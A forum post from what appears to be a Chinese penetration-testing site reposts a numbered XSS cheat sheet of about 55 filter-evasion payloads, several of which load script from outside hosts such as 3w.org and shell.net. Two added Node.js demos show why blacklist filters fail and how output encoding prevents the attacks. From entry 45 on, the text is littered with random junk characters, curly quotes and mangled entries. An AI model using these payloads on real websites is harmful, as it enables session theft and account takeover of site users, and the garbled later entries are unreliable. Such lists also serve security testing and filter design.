中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: XSS Attack Roundup

Author: admin    Time: 2016-4-28 10:06
Title: XSS Attack Roundup
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(99) Unconventional popups

<q/oncut=alert()>
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript directive
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no quotes and no semicolon
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (the semicolons are required here)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (use an encoder / XSS calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (use an encoder / XSS calculator)
<IMG SRC=jav...omitted...S')>

(9) Long UTF-8 Unicode encoding, zero-padded to 7 digits, without semicolons (use an encoder / XSS calculator)
<IMG SRC=jav...omitted...S')>

(10) Hex encoding, also without semicolons (use an encoder / XSS calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab, splitting the javascript: scheme (a literal tab character between jav and ascript)
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the javascript: scheme
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Embedded multi-line injected JavaScript, the extreme case of this family
<IMG SRC=[payload lost in extraction]>

(16) Working around input length limits (every fragment must land on the same page, in this order)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null bytes are basically ineffective against domestic sites, since there is nowhere they can be used)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the javascript: in an IMG tag
<IMG SRC=" &#14;  javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, variant 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, variant 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2 (protocol-relative URL, so the script is fetched over whatever scheme the page uses)
<SCRIPT SRC=//3w.org/XSS/xss.js>
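Added example, not part of the original post: the reason entries (3) through (14), (17) through (19) and (24) keep working is that a blacklist filter looks at the raw bytes while the browser looks at the decoded, control-character-stripped value. The code below is my own Node.js demonstration of that gap. It pits a stock "strip <script> and javascript:" filter (a constructed stand-in, not any real product) against payloads copied from the entries above, then shows the normalization a URL-attribute check needs, and output encoding for text context. All payloads and URLs in it are constructed for the demo.

```javascript
// Added demonstration for the cheat-sheet entries above; not code from the post.
// Run with: node xss_filter_demo.js

// A typical blacklist filter of the kind the cheat sheet is written to defeat:
// remove complete <script>...</script> blocks and the literal "javascript:".
function naiveFilter(html) {
  return html
    .replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '')
    .replace(/javascript:/gi, '');
}

// Decode numeric character references the way an HTML attribute value is
// parsed: &#106; and &#x6A; but also the semicolon-less &#106 / &#x6A forms
// that entries (9) and (10) rely on.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (_, num) => {
    const cp = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
  });
}

// Browsers drop ASCII control characters (tab, LF, CR, NUL, ...) and spaces
// from a URL before resolving its scheme, so "jav<TAB>ascript:" (entries 11-14,
// 17, 19) still means javascript:. Lower-casing covers entry (4). This value is
// only for the check; never emit it, emit the original (properly encoded) value.
function normalizeUrl(url) {
  return decodeNumericEntities(url).replace(/[\u0000-\u0020]/g, '').toLowerCase();
}

// What a filter would have to look for after normalization.
function stillDangerous(html) {
  const n = normalizeUrl(html);
  return n.includes('javascript:') || n.includes('<script');
}

// Constructed payloads, copied from the numbered entries in the comments.
const payloads = [
  "<IMG SRC=JaVaScRiPt:alert('XSS')>",                                                  // (4)
  "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')>", // (5)
  "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')>",      // (10)
  "<IMG SRC=\"jav\tascript:alert('XSS');\">",                                           // (11)
  "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",                                       // (13)
  "<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>",                                           // (24)
];

// Payloads that come out of naiveFilter still carrying a script.
function bypasses() {
  return payloads.filter((p) => stillDangerous(naiveFilter(p)));
}

// The positive-model alternative for a URL-valued attribute (SRC, HREF,
// BACKGROUND, CSS url()): normalize, then allow only http(s) or a same-origin
// path. A protocol-relative //host (entry 25) is rejected as well.
function isSafeUrl(url) {
  const n = normalizeUrl(url);
  const m = /^([a-z][a-z0-9+.-]*):/.exec(n);
  if (m) return m[1] === 'http' || m[1] === 'https';
  return !/^[\/\\]{2}/.test(n);
}

// For text content the right tool is not a filter but output encoding.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

for (const p of payloads) {
  console.log(stillDangerous(naiveFilter(p)) ? 'BYPASS ' : 'blocked', JSON.stringify(p));
}
console.log('isSafeUrl:', isSafeUrl("jav&#x09;ascript:alert('XSS')"), isSafeUrl('/images/logo.png'));
console.log('escapeHtml:', escapeHtml('<IMG SRC=x onerror=alert(1)>'));
```

Only entry (4) is stopped by the filter, and only because the filter happens to be case-insensitive; everything that hides the scheme behind entities, control characters or a missing closing tag sails through. The takeaway the list is making is that a scheme check has to run on the normalized value, and text has to be encoded for its context rather than cleaned.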

(26) Half-open HTML/JavaScript XSS (no closing angle bracket)
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes (breaks out of a string literal whose quotes, but not backslashes, are escaped)
\";alert('XSS');//
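Added example, not part of the original post: entries (28) and (29) run against a page that places user input inside a JavaScript string literal. The page is a constructed template of my own, and new Function() with a fake alert stands in for the browser so the outcome can be checked without one. It contrasts the quote-only escaper that (29) defeats with JSON.stringify plus `<` escaping, and runs the quote-free regex payload from (28).

```javascript
// Added demonstration for entries (28) and (29); not code from the post.
// Run with: node js_string_context_demo.js

// The vulnerable escaper: backslash-escapes the double quote and nothing else.
function quoteOnlyLiteral(s) {
  return '"' + s.replace(/"/g, '\\"') + '"';
}

// The hardened escaper: JSON.stringify escapes \ " and control characters, and
// '<' is written as \u003c so the value can never close the enclosing <script>.
function jsLiteral(s) {
  return JSON.stringify(s).replace(/</g, '\\u003c');
}

// Inline script the (constructed) page would emit; `literal` decides how the
// user input is quoted.
function buildScript(literal, userInput) {
  return 'var name = ' + literal(userInput) + '; return name;';
}

// Execute the script with a spy in place of alert and report what happened.
function run(script) {
  const calls = [];
  let value;
  let error = null;
  try {
    value = new Function('alert', script)((msg) => { calls.push(String(msg)); });
  } catch (e) {
    error = e.name;
  }
  return { calls, value, error };
}

// Entry (29): the user's own backslash eats the backslash the escaper adds,
// turning  var name = "\\";alert('XSS');//"  into a closed string plus a call.
const ESCAPE_PAYLOAD = "\\\";alert('XSS');//";

// Entry (28): no quotes or semicolons at all, for filters that block those
// characters; the regex literal's .source carries the string.
const NO_QUOTE_PAYLOAD = "a=/XSS/\nalert(a.source)";

function demo() {
  return {
    vulnerable: run(buildScript(quoteOnlyLiteral, ESCAPE_PAYLOAD)),
    hardened: run(buildScript(jsLiteral, ESCAPE_PAYLOAD)),
    noQuotes: run(NO_QUOTE_PAYLOAD),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

With the quote-only escaper the spy records alert('XSS') and the rest of the statement is swallowed by the trailing comment; with JSON.stringify the same input comes back out of the script unchanged as data. Escaping the backslash before the quote (or letting JSON.stringify do both) is the whole fix; the `\u003c` rewrite is the extra step needed because the literal lives inside an HTML script element.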

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript (IE only)
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

& J1 E) L. B, E* g7 @) i(45)TD
/ f! M# K- U% W9 n<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
# I. u$ _4 d! Y$ b: v+ Z/ `
& f1 O; s! V- P7 j* Z2 d' K9 C: ^, Y(46)DIV background-image* |2 `1 n# l7 p4 l
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>5 G, M  D7 W2 g0 }6 x; X
9 z8 J* f! v" y* p2 x
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)- W# c6 g# y3 y7 \, J0 ?9 _
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
' e5 z. S: w; Q+ ]* \* z% o. }& s, [; U) R
(48)DIV expression
+ `* a2 e% H% P4 b" I5 b) J8 I<DIV STYLE=”width: expression_r(alert(‘XSS’));”>+ y4 J1 d! A% e2 G" ?

! I# t) T2 L4 r7 Y: P(49)STYLE属性分拆表达- `! j9 a7 f7 r& U
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ u4 Y. }* [3 |: w
* V% m# o" ^" R, r. t! F) ](50)匿名STYLE(组成:开角号和一个字母开头), b- L2 f0 a/ `( @. E
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
; ^  F; w$ F. H& _9 w3 B7 b
% [  ~1 Y* o, D; \5 F9 i6 a# P. a2 B(51)STYLE background-image8 h2 a  O& @) ?- y& ^
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>9 H6 z& ~$ ~8 ]' t' k% R

7 \6 {1 T' M9 _. z' }: J(52)IMG STYLE方式8 h% B! _% v: r' B5 }4 l
exppression(alert(“XSS”))’>
% f3 ?/ J( r8 [6 m  B4 G- \" ?! {4 E" R$ X
(53)STYLE background
" K- s$ d2 C( h* T) z4 n1 ]<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
$ a5 K. N1 y4 D" W; J5 A$ m; r6 T! w" H" f0 v% a
(54)BASE- m7 D' k  {! G3 ~+ n; s' p2 c* y
<BASE HREF=”javascript:alert(‘XSS’);//”>
3 v; G6 c& j: o  K0 l6 J- B
7 H; Z" _9 g# Y5 D; o, r(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS; x+ x) K( m2 M7 H1 r. o
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>

8 Z  I, `# e9 T1 e2 _7 e9 s




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2